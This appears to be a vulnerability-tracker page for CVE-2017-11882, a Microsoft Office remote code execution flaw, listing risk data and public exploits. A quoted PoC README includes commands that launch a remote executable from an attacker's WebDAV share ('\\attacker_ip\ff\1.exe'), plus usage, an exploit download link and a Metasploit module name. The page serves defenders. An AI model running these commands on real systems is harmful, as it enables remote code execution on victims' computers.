CVE-2017-11882

unknown KEV

Published 2021-11-03 · Modified 2021-11-03

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

2.5

Description

Microsoft Office contains a memory corruption vulnerability that allows remote code execution in the context of the current user.

CISA KEV

Vendor: Microsoft
Product: Office
Due date: 2022-05-03

Predictions

Exploit likelihood

99%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-43163 remote windows text · 2 KB

embedi · 2017-11-20

Microsoft Office - OLE Remote Code Execution

text exploit Source: Exploit-DB

Source: https://github.com/embedi/CVE-2017-11882

CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/

MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882

Research: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about

Patch analysis: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html

DEMO PoC exploitation: https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410

webdav_exec CVE-2017-11882

A simple PoC for CVE-2017-11882. This exploit triggers WebClient service to start and execute remote file from attacker-controlled WebDav server. The reason why this approach might be handy is a limitation of executed command length. However with help of WebDav it is possible to launch arbitrary attacker-controlled executable on vulnerable machine. This script creates simple document with several OLE objects. These objects exploits CVE-2017-11882, which results in sequential command execution.

The first command which triggers WebClient service start may look like this:

cmd.exe /c start \\attacker_ip\ff
Attacker controlled binary path should be a UNC network path:

\\attacker_ip\ff\1.exe
Usage

webdav_exec_CVE-2017-11882.py -u trigger_unc_path -e executable_unc_path -o output_file_name
Sample exploit for CVE-2017-11882 (starting calc.exe as payload)

example folder holds an .rtf file which exploits CVE-2017-11882 vulnerability and runs calculator in the system.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43163.zip

Metasploit modules

exploit_windows/fileformat/office_ms17_11882 rank

Microsoft Office CVE-2017-11882

Source fetch failed: fetch_error — view the original via the link above.

References

https://nvd.nist.gov/vuln/detail/CVE-2017-11882

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.